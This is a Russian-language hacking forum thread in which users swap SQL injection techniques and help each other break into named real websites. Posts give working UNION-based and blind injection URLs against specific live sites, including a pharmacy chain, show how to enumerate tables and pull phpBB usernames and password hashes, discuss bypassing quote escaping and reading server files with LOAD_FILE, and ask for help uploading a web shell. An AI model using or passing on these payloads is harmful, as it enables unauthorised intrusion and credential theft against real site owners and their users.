Ваши вопросы по уязвимостям.

2 bag
Я не пойму о каких сиволах ты уже 3 страницы спрашиваешь ?
ascii(lower(substring((select+version( )),1,1)))=0x35/*
Этот запрос показывает первый символ в версии базы если страница отобразилась то выражение верно в данном случае 1 символ=5(0x35)
Идентификация иньекции происходит не по выводу символов, почитай пожалуйста статьи

 

jokester, спасибо за ответ, статьи читал, пишу скрипт, вывожу текст на страницу потом ищу его если есть то все ок, вот пытаюсь воткнуть как в этом методе это можно реализовать

 

не проще

PHP:

and 5=substring(version(),1,1)

? =\

 

Здравствуйте, у меня два вопроса,
Первый - Пожскажите пожалуйста какую нибудь бажную CMS не сложную в установке, чтобы можно было поставить на localhost и отработать заливку шелла например.

Второе - я нашел уязвимый сайт и пытаюсь на нем прочесть файлы, путь до них беру из сообщения мускула об ошибке, но в место содержимого файла цифра за место каторой подставляю LOAD_FILE() просто не отбражается. Я уже и в hex кодировал, все равно не выводит файлы.

Сам сайт -

- так ошибка мускула

- так цифра не отображается

Там прав на чтение не хватает или что-то другое?

 

_http://link.raid.ru/browse.php?cat=-1+union+select+version()/*
помогите раскрутить... ругается на from ..пробовал кодировать некатит...

 

Spaise
http://www.todobulla.cl/show_videos.php?id=-46+union+select+0,user(),2,3/*
web7_u1@localhost
нет прав на чтение

 

зато версия бд 5-ая
5.0.32-Debian_7etch1-log
можно раскрутить сам скуль..

 

login: localhost
Таблиц нет, я в этом не специалист, но раз мускул использует, значит все таки таблы есть. )

 

через куки from не фильтруется составляй свой запрос в куках, ну скорее и в пост не фильтруется

 

http://www.todobulla.cl/show_videos.php?id=-46+union+select+1,2,3,table_name+from+information_schema.tables+limit+1,1/*
меняй лимит получиш таблицы..

 

Мне не нужны таблици, я спрашивал про чтение файлов.

 

Непойму в чом прикол.

выводит нормально

выводит:

 

phpbb_users в другой бд

id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10,11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'+limit+1,1/*

то что получится и будет бд, потом:
id=1'union+select+1,2,3,4,5,username,user_password ,8,9,10,11,12+FROM+БД.phpbb_users+limit+1,1/*

 

возвращает в первом запросе пустоту.
+ если беру на угад например:

возвращает

 

попробуй без limit:
id=1'union+select+1,2,3,4,5,table_schema,6,8,9,10, 11,12+FROM+INFORMATION_SCHEMA.tables+WHER E+TABLE_NAME='phpbb_users'/*

 

Попробуй так :

PHP:

<?Govyuazhiy huy
"Ebitnya";
?HUY>

 

''phpbb_users''' идет экранирование кавычек одиночных... попробуй обойди с помощью char()

 

Обошол!(/*)
Спасибо всем кто помог, всем +5

 

ндя, нет там никакого экранирования, посмотри еще раз на ошибку, просто кавычка скриптом добавляется и все, т.е. надо отсекать ее с помощью комментов /*

 

Нашел скулю
--------------------------
Сеть аптечных магазинов!
Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,4,5/*#s576


5.0.22-log
zdplus@localhost
---------------------------------
information_schema.tables
Цитата:http://www.zdorovie-plus.com/catalog/index.php?g=553+union+select+1,2,3,table_name,5+fr om+information_schema.tables/*#s576
----------------------------------
вывожу колонки? например с zdp_usr

получаю

как я понял экранирования кавычек нет
------------------------------------
но при попытке вывода колонок выплевует
звездочки-заместо текста и ошибку

------------------------------------
рас уж кавычки не фильтруются, значит как то можно залить шелл
я шеллы еще не заливал-буду рад примеру
------------------------------------